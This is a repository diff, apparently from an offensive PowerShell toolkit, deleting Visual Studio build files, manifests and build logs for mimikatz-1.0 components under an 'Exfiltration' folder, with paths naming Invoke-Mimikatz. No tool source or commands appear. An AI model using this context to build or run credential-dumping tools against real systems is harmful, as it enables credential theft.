<ErrorReporting>None</ErrorReporting>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<AdditionalDependencies>advapi32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<LinkErrorReporting>NoErrorReport</LinkErrorReporting>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="kappfree.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="kappfree.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="kappfree.rc" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

12
Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj.filters
View File

@ -1,12 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<ClInclude Include="kappfree.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="kappfree.rc" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="kappfree.c" />
</ItemGroup>
</Project>

BIN
Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/CL.read.1.tlog
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/CL.write.1.tlog
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/cl.command.1.tlog
View File

Binary file not shown.

10
Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/kelloworld.dll.intermediate.manifest
View File

@ -1,10 +0,0 @@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>

2
Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/kelloworld.lastbuildstate
View File

@ -1,2 +0,0 @@
#v4.0:v100
Release|Win32|C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\|

BIN
Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/kelloworld.res
View File

Binary file not shown.

5
Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/kelloworld.write.1.tlog
View File

@ -1,5 +0,0 @@
^C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\librairies\kelloworld\kelloworld.vcxproj
C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kelloworld.lib
C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kelloworld.lib
C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kelloworld.exp
C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kelloworld.exp

1
Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/link-cvtres.read.1.tlog
View File

@ -1 +0,0 @@


1
Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/link-cvtres.write.1.tlog
View File

@ -1 +0,0 @@


BIN
Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/link.command.1.tlog
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/link.read.1.tlog
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/link.write.1.tlog
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/mt.command.1.tlog
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/mt.read.1.tlog
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/mt.write.1.tlog
View File

Binary file not shown.

BIN
Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/rc.command.1.tlog
View File

Binary file not shown.

Some files were not shown because too many files have changed in this diff Show More